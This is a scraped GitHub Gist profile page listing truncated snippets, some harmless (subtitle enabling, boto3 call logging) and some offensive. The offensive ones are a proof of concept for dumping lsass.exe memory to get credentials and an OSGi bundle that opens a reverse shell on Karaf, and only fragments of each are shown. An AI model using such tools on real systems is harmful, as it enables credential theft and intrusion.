Skip to content

Instantly share code, notes, and snippets.


2XXE GeneralTesler

View GitHub Profile
GeneralTesler / refl.cpp
Last active Jan 5, 2023
PoC using RtlCreateProcessReflection + MiniDumpWriteDump to dump lsass.exe process memory
View refl.cpp
#include <Windows.h>
#include <iostream>
#include <DbgHelp.h>
#include <processsnapshot.h>
#include <TlHelp32.h>
#include <processthreadsapi.h>
//process reflection stuff copied from:
//minidump/process searching copied from:
//compile using: cl.exe refl.cpp /DUNICODE
View filters.txt
! hide annoying google drive modal that prompts to sign in
! crunchyroll filters
GeneralTesler /
Created Aug 17, 2020
Enable subtitles on Funimation web player

Enable subtitles on Funimation web player using VideoJS addRemoteTextTrack

// get the player iframe 
var frame = document.getElementsByTagName("iframe")[0].contentWindow
// get the videojs object inside the iframe 
// fp is the instance of the FunimationPlayer inside the iframe and stores the text track info
//     vtt is usually the first item in the text track list
GeneralTesler /
Created May 25, 2020
Log AWS API calls using boto3 event system
# see:
import boto3
from botocore.client import Config
from botocore import UNSIGNED
import json
def intercept_params(params, **kwargs):
GeneralTesler /
Last active May 25, 2020
Patch botocore to log API calls + parameters
import boto3
import botocore
from botocore.client import BaseClient, Config, ClientMeta
import json
def log_api(self, operation_name, api_params):
meta: ClientMeta = self.meta
GeneralTesler / ladon.go
Created Feb 17, 2020
basic code for using Ladon; taken + merged from readme:
View ladon.go
package main
import (
manager ""
func main() {
GeneralTesler / mssql.ps1
Last active Dec 15, 2019
Search MSSQL databases for columns containing keywords using SqlServer PowerShell PSDrive
View mssql.ps1
Import-Module SqlServer
function Get-SQLTablesByKeyword {
Get-SQLTablesByKeyword -Computer <hostname>
Get-SQLTablesByKeyword -Computer sql01.domain.local
Example Output:
Table Database Column
View lambda_gscript.json
"Version": "2012-10-17",
"Statement": [
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
import json,os,boto3
def lambda_handler(event, context):
iid = os.getenv('INSTANCE_ID',None)
pd = os.getenv('PAYLOAD_DIR',None)
pipeline = boto3.client('codepipeline')
job = event['CodePipeline.job']['id']
if iid is None or pd is None:
GeneralTesler /
Last active Dec 6, 2019
simple reverse shell via OSGi bundle for Karaf
package com.demo.exec;
import org.osgi.framework.BundleActivator;
import org.osgi.framework.BundleContext;
import java.lang.*;
public class ExecActivator implements BundleActivator {
public void start(BundleContext bundleContext) throws Exception {